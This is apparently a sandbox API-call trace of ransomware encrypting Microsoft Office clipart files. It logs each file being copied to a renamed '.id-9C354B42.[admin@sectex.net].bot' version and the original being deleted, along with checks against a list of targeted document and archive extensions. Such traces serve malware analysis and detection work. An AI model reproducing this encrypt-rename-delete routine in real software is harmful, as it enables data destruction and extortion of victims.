	[0140.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.381] GetLastError () returned 0x0
	[0140.381] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1540, lpOverlapped=0x0) returned 1
	[0140.382] WriteFile (in: hFile=0x38c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1550, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1550, lpOverlapped=0x0) returned 1
	[0140.383] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.383] WriteFile (in: hFile=0x38c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.383] SetEndOfFile (hFile=0x38c) returned 1
	[0140.383] CloseHandle (hObject=0x38c) returned 1
	[0140.383] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.384] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.385] CloseHandle (hObject=0x3a8) returned 1
	[0140.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid")) returned 1
	[0140.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.386] lstrlenW (lpString=".doc") returned 4
	[0140.386] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.386] lstrlenW (lpString=".docx") returned 5
	[0140.386] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.386] lstrlenW (lpString=".pdf") returned 4
	[0140.387] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.387] lstrlenW (lpString=".xls") returned 4
	[0140.387] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.387] lstrlenW (lpString=".xlsx") returned 5
	[0140.387] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.387] lstrlenW (lpString=".ppt") returned 4
	[0140.387] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.387] lstrlenW (lpString=".zip") returned 4
	[0140.387] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.387] lstrlenW (lpString=".rar") returned 4
	[0140.387] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.387] lstrlenW (lpString=".bz2") returned 4
	[0140.387] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.387] lstrlenW (lpString=".7z") returned 3
	[0140.387] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.387] lstrlenW (lpString=".dbf") returned 4
	[0140.387] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.387] lstrlenW (lpString=".1cd") returned 4
	[0140.387] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.387] lstrlenW (lpString=".jpg") returned 4
	[0140.387] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.387] lstrlenW (lpString=".doc") returned 4
	[0140.387] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.387] lstrlenW (lpString=".docx") returned 5
	[0140.387] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.387] lstrlenW (lpString=".pdf") returned 4
	[0140.387] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.387] lstrlenW (lpString=".xls") returned 4
	[0140.388] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.388] lstrlenW (lpString=".xlsx") returned 5
	[0140.388] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.388] lstrlenW (lpString=".ppt") returned 4
	[0140.388] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.388] lstrlenW (lpString=".zip") returned 4
	[0140.388] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.388] lstrlenW (lpString=".rar") returned 4
	[0140.388] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.388] lstrlenW (lpString=".bz2") returned 4
	[0140.388] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.388] lstrlenW (lpString=".7z") returned 3
	[0140.388] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.388] lstrlenW (lpString=".dbf") returned 4
	[0140.388] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.388] lstrlenW (lpString=".1cd") returned 4
	[0140.388] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63
	[0140.388] lstrlenW (lpString=".jpg") returned 4
	[0140.388] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.388] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.388] lstrlenW (lpString="OUTDR_01.MID") returned 12
	[0140.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.389] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6644) returned 1
	[0140.389] CloseHandle (hObject=0x3a8) returned 1
	[0140.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid")) returned 0x20
	[0140.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.390] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.390] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.390] GetLastError () returned 0x0
	[0140.390] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x19f4, lpOverlapped=0x0) returned 1
	[0140.392] WriteFile (in: hFile=0x38c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1a00, lpOverlapped=0x0) returned 1
	[0140.398] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.398] WriteFile (in: hFile=0x38c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.398] SetEndOfFile (hFile=0x38c) returned 1
	[0140.398] CloseHandle (hObject=0x38c) returned 1
	[0140.398] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.399] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.401] CloseHandle (hObject=0x3a8) returned 1
	[0140.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.401] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid")) returned 1
	[0140.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.402] lstrlenW (lpString=".doc") returned 4
	[0140.402] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.402] lstrlenW (lpString=".docx") returned 5
	[0140.402] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.402] lstrlenW (lpString=".pdf") returned 4
	[0140.402] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.402] lstrlenW (lpString=".xls") returned 4
	[0140.402] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.402] lstrlenW (lpString=".xlsx") returned 5
	[0140.402] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.402] lstrlenW (lpString=".ppt") returned 4
	[0140.402] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.402] lstrlenW (lpString=".zip") returned 4
	[0140.402] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.402] lstrlenW (lpString=".rar") returned 4
	[0140.402] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.402] lstrlenW (lpString=".bz2") returned 4
	[0140.402] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.402] lstrlenW (lpString=".7z") returned 3
	[0140.402] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.402] lstrlenW (lpString=".dbf") returned 4
	[0140.402] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.402] lstrlenW (lpString=".1cd") returned 4
	[0140.402] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.402] lstrlenW (lpString=".jpg") returned 4
	[0140.403] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.403] lstrlenW (lpString=".doc") returned 4
	[0140.403] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.403] lstrlenW (lpString=".docx") returned 5
	[0140.403] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.403] lstrlenW (lpString=".pdf") returned 4
	[0140.403] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.403] lstrlenW (lpString=".xls") returned 4
	[0140.403] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.403] lstrlenW (lpString=".xlsx") returned 5
	[0140.403] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.403] lstrlenW (lpString=".ppt") returned 4
	[0140.403] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.403] lstrlenW (lpString=".zip") returned 4
	[0140.403] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.403] lstrlenW (lpString=".rar") returned 4
	[0140.403] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.403] lstrlenW (lpString=".bz2") returned 4
	[0140.403] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.403] lstrlenW (lpString=".7z") returned 3
	[0140.403] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.403] lstrlenW (lpString=".dbf") returned 4
	[0140.403] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.403] lstrlenW (lpString=".1cd") returned 4
	[0140.403] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63
	[0140.403] lstrlenW (lpString=".jpg") returned 4
	[0140.403] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.404] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.404] lstrlenW (lpString="PAPER_01.MID") returned 12
	[0140.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.409] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6763) returned 1
	[0140.409] CloseHandle (hObject=0x3a8) returned 1
	[0140.409] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid")) returned 0x20
	[0140.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.497] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.497] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.498] GetLastError () returned 0x0
	[0140.498] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1a6b, lpOverlapped=0x0) returned 1
	[0140.505] WriteFile (in: hFile=0x3a4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1a70, lpOverlapped=0x0) returned 1
	[0140.507] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.507] WriteFile (in: hFile=0x3a4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.507] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.614] CloseHandle (hObject=0x3a4) returned 1
	[0140.614] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.614] SetEndOfFile (hFile=0x388) returned 1
	[0140.616] CloseHandle (hObject=0x388) returned 1
	[0140.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.678] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid")) returned 1
	[0140.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.756] lstrlenW (lpString=".doc") returned 4
	[0140.756] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.756] lstrlenW (lpString=".docx") returned 5
	[0140.756] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.756] lstrlenW (lpString=".pdf") returned 4
	[0140.756] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.756] lstrlenW (lpString=".xls") returned 4
	[0140.756] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.756] lstrlenW (lpString=".xlsx") returned 5
	[0140.756] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.756] lstrlenW (lpString=".ppt") returned 4
	[0140.756] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.756] lstrlenW (lpString=".zip") returned 4
	[0140.756] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.756] lstrlenW (lpString=".rar") returned 4
	[0140.756] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.756] lstrlenW (lpString=".bz2") returned 4
	[0140.756] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.756] lstrlenW (lpString=".7z") returned 3
	[0140.756] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.756] lstrlenW (lpString=".dbf") returned 4
	[0140.757] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.757] lstrlenW (lpString=".1cd") returned 4
	[0140.757] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.757] lstrlenW (lpString=".jpg") returned 4
	[0140.757] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.757] lstrlenW (lpString=".doc") returned 4
	[0140.757] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.757] lstrlenW (lpString=".docx") returned 5
	[0140.757] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.757] lstrlenW (lpString=".pdf") returned 4
	[0140.757] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.757] lstrlenW (lpString=".xls") returned 4
	[0140.757] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.757] lstrlenW (lpString=".xlsx") returned 5
	[0140.757] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.757] lstrlenW (lpString=".ppt") returned 4
	[0140.757] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.757] lstrlenW (lpString=".zip") returned 4
	[0140.757] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.757] lstrlenW (lpString=".rar") returned 4
	[0140.757] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.757] lstrlenW (lpString=".bz2") returned 4
	[0140.757] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.757] lstrlenW (lpString=".7z") returned 3
	[0140.757] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.757] lstrlenW (lpString=".dbf") returned 4
	[0140.758] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.758] lstrlenW (lpString=".1cd") returned 4
	[0140.758] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63
	[0140.758] lstrlenW (lpString=".jpg") returned 4
	[0140.758] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.758] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.758] lstrlenW (lpString="PARNT_08.MID") returned 12
	[0140.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.772] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=7347) returned 1
	[0140.772] CloseHandle (hObject=0x31c) returned 1
	[0140.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid")) returned 0x20
	[0140.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.773] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.773] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
